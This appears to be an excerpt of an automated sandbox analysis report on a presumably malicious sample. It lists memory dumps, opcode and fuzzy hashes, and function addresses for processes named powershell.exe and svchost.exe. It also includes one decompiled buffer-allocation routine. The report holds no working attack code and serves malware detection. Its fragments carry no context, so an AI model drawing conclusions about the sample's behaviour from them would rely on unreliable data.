Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: free$memcpy$mallocwcslen
String ID:
API String ID: 726966127-0
Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}

APIs

??2@YAPAXI@Z.MSVCRT ref: 00405B19
??2@YAPAXI@Z.MSVCRT ref: 00405B37
??2@YAPAXI@Z.MSVCRT ref: 00405B55
??2@YAPAXI@Z.MSVCRT ref: 00405B73

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exe PID: 6992 Parent PID: 6200 powershell.exeCOMMON

Executed Functions

Function 02BC6AD0, Relevance: .5, Instructions: 463COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3b73b36e6adb15ebc79bd6550daecbf23020ee7879b25fa7afdbe19a7c3cc85
Instruction ID: 39b2a9031126a1a351da0671d41b63efaa47c76643bb355884a23039d503f192
Opcode Fuzzy Hash: e3b73b36e6adb15ebc79bd6550daecbf23020ee7879b25fa7afdbe19a7c3cc85
Instruction Fuzzy Hash: D9022C34B002049FD714DF65C894AAEBBB6EB88314F24846DE50A9B795DF35EC06CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02BCB7B8, Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 405137a8471fdb71e46f74c40690e7a9aacef2b8467cd4c04dcfc8845e17e3ec
Instruction ID: 454fcfeefae6332526053d1189033ff440a2d58687ec204d1706b05f9e8bc894
Opcode Fuzzy Hash: 405137a8471fdb71e46f74c40690e7a9aacef2b8467cd4c04dcfc8845e17e3ec
Instruction Fuzzy Hash: 1CE18C70A002049FCB14DF64D490A9EBBF2FF88308F6489A9E5499B761DB75EC06CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02BC73D8, Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 881806f86b080025d1c62bbe5b3b219b8b34adc649fa9b53722876f7f95279ff
Instruction ID: 1413501132651b42b7795792468bf02794b647e17deeb7d655ffc5ad2eecd36d
Opcode Fuzzy Hash: 881806f86b080025d1c62bbe5b3b219b8b34adc649fa9b53722876f7f95279ff
Instruction Fuzzy Hash: 87D15B74B002058FCB04DF69D490AAEBBB6EF88314F2484A9D506EB391DB74EC45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02BC5468, Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baaa7d8230bc40942916356850268990a25613db82da3ef2c66f4ae162d3958c
Instruction ID: 8a309a5bcfe69c09823a2b406af2527ec70529efcdc468b4904cfce510e9f334
Opcode Fuzzy Hash: baaa7d8230bc40942916356850268990a25613db82da3ef2c66f4ae162d3958c
Instruction Fuzzy Hash: 3BA110757002009FD7249B79D854BAA7BE7EFC4315F2485BDE81ADB781CF38A8068B91

Uniqueness

Uniqueness Score: -1.00%

Function 02BC5808, Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77bb60c0a22a1c8f2dfa7e0bc58f749de2786dd0c1c0ccd29be1fd1795a04e2d
Instruction ID: a6f02b4d13b1f11f18946ebcf1f2c41a55fce64e06baa0394177c06e739b5e0b
Opcode Fuzzy Hash: 77bb60c0a22a1c8f2dfa7e0bc58f749de2786dd0c1c0ccd29be1fd1795a04e2d
Instruction Fuzzy Hash: B861B275A002049FCB15EF68D4909ADBBB2FFC9311B5085ADE805AB350DB31AC46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02BC73C8, Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dfbc947636d9e6932a1fd348685613a4b1ea623f1032fdd5c0a30904d56a30d
Instruction ID: 5c1cfa0ec1125349483f263903abdeaeb04e516e0f41e40e8d15074915477713
Opcode Fuzzy Hash: 4dfbc947636d9e6932a1fd348685613a4b1ea623f1032fdd5c0a30904d56a30d
Instruction Fuzzy Hash: 1C611C70B002098FDB04DFA9D480AAEBBF6EF88354B2484A9D505EB355DB74ED45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02BC13D0, Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e76bd6611d9f3364896c65b18d45a305d12c3a873231533f3e165387caf85426
Instruction ID: 0d7c88ab06bf42954860451fd350d8d54034678349a49e272c34a22bbc39f924
Opcode Fuzzy Hash: e76bd6611d9f3364896c65b18d45a305d12c3a873231533f3e165387caf85426
Instruction Fuzzy Hash: 9B417D75A10219CFDB14CFA9D844BAEBBB1FF88305F144569D80AAB342DB719845CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02BC6730, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97489392948d4b85397ae754e038b8a379b3e122c5ff2d50608349856358f451
Instruction ID: 3efb6ab1a9af25341d8cbfc1d5db81bbdbc5997a488332ee2f4498ee89745c9d
Opcode Fuzzy Hash: 97489392948d4b85397ae754e038b8a379b3e122c5ff2d50608349856358f451
Instruction Fuzzy Hash: E0417E30205B819FC751DF24C48099ABBB2BF81204B548DADE9894FB62CBB5FD59CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 02BC6740, Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5595114dc26019d41cccffa8912d058e5e4b4948acddee392177033655ebd766
Instruction ID: 93f5a8f6ccfd28243096faf8499b31771f93b1a64484504c26eb776b490066e3
Opcode Fuzzy Hash: 5595114dc26019d41cccffa8912d058e5e4b4948acddee392177033655ebd766
Instruction Fuzzy Hash: F3418D30201B819FC751DF24C48098ABBB2FF81204B548DADE9894BB62CBB5FD59CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 02BC69C0, Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87c02a051de7f355ce9ba922cb3b3840e6d079ee76892a8037ea8bf513a995ce
Instruction ID: 3e51630af668208aa851753d703aed6bcad9694bd6a3456f326a32471bfa35ea
Opcode Fuzzy Hash: 87c02a051de7f355ce9ba922cb3b3840e6d079ee76892a8037ea8bf513a995ce
Instruction Fuzzy Hash: 49314D75600B018FC324DF1AE484A46B7F5FB84325720CA6EE16A87B91C771F895CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02BCB7A8, Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d57c806d775d6e52661f719e55ed14e7a20bc06c4fc251c0918f02f19f81b134
Instruction ID: 65f82a00ffeaf52d9ec2014ecd35f8601b0e1768fac6be6b357bee4db145d7e2
Opcode Fuzzy Hash: d57c806d775d6e52661f719e55ed14e7a20bc06c4fc251c0918f02f19f81b134
Instruction Fuzzy Hash: 7E21A3703046009FD724DB24D881A5A77E6EF81359F6488ADD409CFBA1DB75FC05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02BC6650, Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3718a342485d298ba304b2a9c2edd9d53acff2ace5e9c44e380b4c3ef57c898
Instruction ID: dcba4153213e8bb42f63758d71a069c99f42b2f4bfa652fb4478f4a5107d0131
Opcode Fuzzy Hash: d3718a342485d298ba304b2a9c2edd9d53acff2ace5e9c44e380b4c3ef57c898
Instruction Fuzzy Hash: 6321F170A007449FCB20AF64D441AAEBBF2EFC9210F144C6ED88697790DB34AC098BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02BC6660, Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 761297d36797f22c461321fb74dc1c852ef86f0935d6bbf81a6c92582c64270c
Instruction ID: f9c8f02cfbe463b181788439ad9aca4aa0f1bdcdc6df5f8349a743b20a8497c1
Opcode Fuzzy Hash: 761297d36797f22c461321fb74dc1c852ef86f0935d6bbf81a6c92582c64270c
Instruction Fuzzy Hash: E2218E70A007449FCB24AF64D440AAEBBF6EF88210F54496DD88697790DB74AC098FA1

Uniqueness

Uniqueness Score: -1.00%

Function 02BC6480, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cda76d7890b8732d3b58b41a0ca4e35ba405d2fa604479419a02a4129877422
Instruction ID: 5356ca39067bf110c9c1fbce13cef2383e88b52dcbf6764b8b6b1c0911fa1200
Opcode Fuzzy Hash: 2cda76d7890b8732d3b58b41a0ca4e35ba405d2fa604479419a02a4129877422
Instruction Fuzzy Hash: 5C11E475B001066FCB00DFA9D840AEEFBBAFFC4214B508429E914EB340EB71D9048BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02BC6AC0, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65cb87235ad5d32b3502b9aea9449fa0ae3a4a96d10843a5ea118c4c1afe9224
Instruction ID: deb04cab8bc90ad6725ba9f70a3d2dbfa234344ce362036805f3c76bd794c6e4
Opcode Fuzzy Hash: 65cb87235ad5d32b3502b9aea9449fa0ae3a4a96d10843a5ea118c4c1afe9224
Instruction Fuzzy Hash: DE11C435B002089BCB14DBA5D451ADFB7BAEBC4314F204479E516A7785DF32AD06CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02BC7328, Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd666699e1ca2e6081a62fe1634d8dde830d88c7afc0524b856cf51f9e9af8bb
Instruction ID: 33274de91f0badb8bf6ba064a7a4061644bb898dac9b8cae09b1a95af6d821ce
Opcode Fuzzy Hash: dd666699e1ca2e6081a62fe1634d8dde830d88c7afc0524b856cf51f9e9af8bb
Instruction Fuzzy Hash: 2701F5322002148FC705EF54E440BAA77A6FF80365F1488B8E6099F6A1CB36EC11DFE4

Uniqueness

Uniqueness Score: -1.00%

Function 02C3D005, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.943000635.0000000002C3D000.00000040.00000001.sdmp, Offset: 02C3D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac2936608d6f7170cb47d80347ab44ef21816d14cb5d08d48773045079ea8fad
Instruction ID: 9241ac2012f50a56dd89902f9ad60e9d753f19d01b1747464bd80ebbfbd40739
Opcode Fuzzy Hash: ac2936608d6f7170cb47d80347ab44ef21816d14cb5d08d48773045079ea8fad
Instruction Fuzzy Hash: 2901406140D3C09ED7138B258894B52BFB4DF43624F1984DBD9858F293C2795949C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 02C3D01D, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.943000635.0000000002C3D000.00000040.00000001.sdmp, Offset: 02C3D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6806c09dd8492234044b15bcf8a307344d8308766de7b52d2e8de73f9f30da4
Instruction ID: 3b3bbfb936a9f81d4230438d1fe79dcda0685dfc39610d525f302ceb98c5afce
Opcode Fuzzy Hash: e6806c09dd8492234044b15bcf8a307344d8308766de7b52d2e8de73f9f30da4
Instruction Fuzzy Hash: 41012B714083409AD7124A26CCC47A7FFA8EF81A68F18C859FD065B647C3799A45C6F1

Uniqueness

Uniqueness Score: -1.00%

Function 02BC6472, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f652108cc2f9f3c7100db1af286921fbd7f2ec2ede914796297a6fbb1e9247e9
Instruction ID: d4422d1031973d382225f884bd4c6a48dede4b81fb6d90e073007cd5a437c788
Opcode Fuzzy Hash: f652108cc2f9f3c7100db1af286921fbd7f2ec2ede914796297a6fbb1e9247e9
Instruction Fuzzy Hash: FBF0AF75B042156FCB218E6ADC41AABBFFCFF86214B548066F954C7341E371D9058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02BC5B12, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d2dac87107af1c0ca28361995c88b51d9931fbede0f6c021b0526207351f815
Instruction ID: b5237a6d90360e0f416599b6c6020f39e55a6d8dc76f1cb3e0a831911bce3e77
Opcode Fuzzy Hash: 9d2dac87107af1c0ca28361995c88b51d9931fbede0f6c021b0526207351f815
Instruction Fuzzy Hash: 28E0D87220434017E7320956AC103D36FA5CBC3164F1D00EBD994CB692E700E847C3A5

Uniqueness

Uniqueness Score: -1.00%

Function 02BC5B20, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08930b8b47ed7cb49f7a6b8e8db801cf37c8a882adbe31875a857a35253ab939
Instruction ID: 03bda67a0e0d33fc1f691820b4a6fbdce33d0ecbfec460b5acb56bc6d82dd802
Opcode Fuzzy Hash: 08930b8b47ed7cb49f7a6b8e8db801cf37c8a882adbe31875a857a35253ab939
Instruction Fuzzy Hash: 3CD0177230471413EA3115ABAC04796AA8DCBC12A8F6904AEAA45D7690EB51F84583A9

Uniqueness

Uniqueness Score: -1.00%

Function 02BC7811, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c03c2bae1a4d6da9f250285af932da0b64f07fc54aa2663ca03ebf0d8618239
Instruction ID: 014c090fd8f834aa5a9119a204589bcdaae886d0f73f280d89d3706e896ac154
Opcode Fuzzy Hash: 9c03c2bae1a4d6da9f250285af932da0b64f07fc54aa2663ca03ebf0d8618239
Instruction Fuzzy Hash: 81C0925800D2D02FD303AB6484A49887F71AE9B2007A844DBE0E09B362D5185D628B22

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02BC0040, Relevance: .9, Instructions: 932COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7a1f501ae6aeb9a23009f9fb1b887be6228acbbd631c65d8617c111230ed4fb
Instruction ID: 6d0afbd67e4f54e9b1c14e4e8a1e959bc0a070baadced392c40e20040301727d
Opcode Fuzzy Hash: e7a1f501ae6aeb9a23009f9fb1b887be6228acbbd631c65d8617c111230ed4fb
Instruction Fuzzy Hash: 2E820474A00604DFC768EF68C588AADB7B2FF49318F61899CE5569B362CB31EC45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02BCEA70, Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d3055b67977571a44dfb1f126e61449f8396c7a165f6689e8125fa56aca6b80
Instruction ID: bb52986ff44c762773b04d2b924e6fd22fe260aead38e359783f3b924215b845
Opcode Fuzzy Hash: 7d3055b67977571a44dfb1f126e61449f8396c7a165f6689e8125fa56aca6b80
Instruction Fuzzy Hash: 6B426B75B00615CFCB14DF69D484AAEBBF6EF88354B2584A9E406DB361DB34EC42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02BCAA50, Relevance: .4, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea46b3e4473acb8ce09a6dae79b80254fdc4cc57d1f828e47532a7dc49c88ee
Instruction ID: f06d645fe094e630ffcbb5f33278da8a458d9c160529958e0418e0a10b60f881
Opcode Fuzzy Hash: bea46b3e4473acb8ce09a6dae79b80254fdc4cc57d1f828e47532a7dc49c88ee
Instruction Fuzzy Hash: 95E1BC71B007048FCB24AF35885466AB7E7EFC9258B24896CD546CB790EF78EC06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02BCF6C8, Relevance: 7.7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

Strings

$%k, xrefs: 02BCF897
c )j^, xrefs: 02BCF785
$%k, xrefs: 02BCF771
$%k, xrefs: 02BCF88B
$%k, xrefs: 02BCF74B
s )j^, xrefs: 02BCF75F

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID: $%k$$%k$$%k$$%k$c )j^$s )j^
API String ID: 0-1989931262
Opcode ID: 155dd03bbf7871b094d33e67d6ebcde82e0f8feb97be697297448e35b3e75e10
Instruction ID: 3035c279d14831116e34f122bf714fe47374a8707c9181f6e8a52ce5a46956ed
Opcode Fuzzy Hash: 155dd03bbf7871b094d33e67d6ebcde82e0f8feb97be697297448e35b3e75e10
Instruction Fuzzy Hash: BA51DF317046108F8729AB6994616AF7BE3DFC525872489BEC409CFB40EF39AD0687E1

Uniqueness

Uniqueness Score: -1.00%

Function 02BCF6B8, Relevance: 5.1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

Strings

c )j^, xrefs: 02BCF785
$%k, xrefs: 02BCF771
$%k, xrefs: 02BCF74B
s )j^, xrefs: 02BCF75F

Memory Dump Source

Source File: 0000000C.00000002.942692959.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false

Similarity

API ID:
String ID: $%k$$%k$c )j^$s )j^
API String ID: 0-58721844
Opcode ID: bbd848e7d0d910d0c74720aba9ac23beaf4e40c2048d531369bb0349e56058bd
Instruction ID: 0890fa00e5fac1bd653e0d1aa225c83aeaae0a3f30c43aa34587eb972b8016e8
Opcode Fuzzy Hash: bbd848e7d0d910d0c74720aba9ac23beaf4e40c2048d531369bb0349e56058bd
Instruction Fuzzy Hash: 372104313007018FC7219F25C4806BABBE3EF84218B6889FFC4198BA40EB75E819CB90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exe PID: 6140 Parent PID: 7060 svchost.exeCOMMON

Executed Functions

Function 013E0490, Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

`k, xrefs: 013E050E

Memory Dump Source

Source File: 00000011.00000002.940704563.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false

Similarity

API ID:
String ID: `k
API String ID: 0-2298430543
Opcode ID: 5ee4b7e9413ce7edc47dd825bf1114777f55ea4aecd946199f5e9748a59f3a6e
Instruction ID: 59bef570f3784617fd9a02e68fde0967b0ffdd63539d8a15dfd2be4a0c15d4a0
Opcode Fuzzy Hash: 5ee4b7e9413ce7edc47dd825bf1114777f55ea4aecd946199f5e9748a59f3a6e
Instruction Fuzzy Hash: FF111E30E0050AAFCF44FFA8D8515EDB7B2FF45208B6049A9D019AB354EB756E09CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0128D200, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.939484928.000000000128D000.00000040.00000001.sdmp, Offset: 0128D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 891cf734c3267164d1f0250c9eb6479a13a22b2311f0b0c3dec1f42ec1adcdb6
Instruction ID: 93ea248daca0316f5642130e92d3a6491709fc1460f4aaa9dc3156fb284ea687
Opcode Fuzzy Hash: 891cf734c3267164d1f0250c9eb6479a13a22b2311f0b0c3dec1f42ec1adcdb6
Instruction Fuzzy Hash: 3E210672514248DFDF05EF94D9C0B26BB65FB88324F248569E9054B2CBC376D81ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0128D4C8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.939484928.000000000128D000.00000040.00000001.sdmp, Offset: 0128D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a43bfc95f2eba2da0966d219a7771b09f2a453256b1b9784b883c21194ba7e0
Instruction ID: 3af11654bdadeca4aa80ea5d049dd30d238a145b5293c9962d02571943f0bcbf
Opcode Fuzzy Hash: 2a43bfc95f2eba2da0966d219a7771b09f2a453256b1b9784b883c21194ba7e0
Instruction Fuzzy Hash: 46213671510204EFDF11EF58E8C0B16BB65FB84328F20856AE9050B6C7C33AD81AC6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0128D1FB, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.939484928.000000000128D000.00000040.00000001.sdmp, Offset: 0128D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 080d7d6311979cb628b626afb9c5a1a9eaef433d3388d178d81fdc19ba018a6a
Instruction ID: 89535494dc144a3b4a0129cc9b354a3ceac83e4179c3f22ebb8c25b5993d9c81
Opcode Fuzzy Hash: 080d7d6311979cb628b626afb9c5a1a9eaef433d3388d178d81fdc19ba018a6a
Instruction Fuzzy Hash: 97219076404244DFDB06DF54D9C4B16BF71FB84320F24C1A9DD044A69BC33AD45ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 0128D4C3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.939484928.000000000128D000.00000040.00000001.sdmp, Offset: 0128D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35d1d1512c5009ec7e133a77178c84f5ca9ae226b41290c1d563dc625792c783
Instruction ID: f738b6cee4edf2cc6ec22777cf2cd6a8908aaccef4ca7cd0a4613c0b7db8dfd7
Opcode Fuzzy Hash: 35d1d1512c5009ec7e133a77178c84f5ca9ae226b41290c1d563dc625792c783
Instruction Fuzzy Hash: B411DF76404284DFDB12DF54E5C4B16BF71FB84324F2486AAD9090B697C33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 013E0458, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.940704563.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0278193132d4c323665dbdbe63c4464dec9b8ce7b299bd8983c7b73e3969d962
Instruction ID: 9f18db84e566ab3c1df501f80bd1c214212777d181854755fcc86499514b274f
Opcode Fuzzy Hash: 0278193132d4c323665dbdbe63c4464dec9b8ce7b299bd8983c7b73e3969d962
Instruction Fuzzy Hash: 07D0C9B065B3816FDF076B7594281643FE5EE9320431918DED189CB5A2D66A088AC712

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0066FB3C, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.918392336.0000000000632000.00000002.00020000.sdmp, Offset: 00630000, based on PE: true

Associated: 00000011.00000002.918342830.0000000000630000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.919770595.00000000006CC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3714f23fe24c449d252d1fb7200f382cfcf4d79d61b7147a3fd65e9af03fb414
Instruction ID: 422baff3c716e375a2e0aeb47428e0cd4f401fbce0a2fd1a8abe62b8a92a6ce4
Opcode Fuzzy Hash: 3714f23fe24c449d252d1fb7200f382cfcf4d79d61b7147a3fd65e9af03fb414
Instruction Fuzzy Hash: B4E0B6A786EBC05EC30343309D356906F719A2734630E81DB85A6CF4A7E06AA846D376

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exe PID: 3524 Parent PID: 6180 svchost.exeCOMMON

Executed Functions

Function 01BF1A28, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,01BF20C1,00000800,00000000,00000000), ref: 01BF22D2

Memory Dump Source

Source File: 00000016.00000002.939752325.0000000001BF0000.00000040.00000001.sdmp, Offset: 01BF0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d683a773d022ea1c26df351f845e4655a8f7b15248823062b9f9be1ef519c040
Instruction ID: 0eb5153bdf1a75abd10a476863dcd5229e4b0e303d7b587f95ae56d969c33801
Opcode Fuzzy Hash: d683a773d022ea1c26df351f845e4655a8f7b15248823062b9f9be1ef519c040
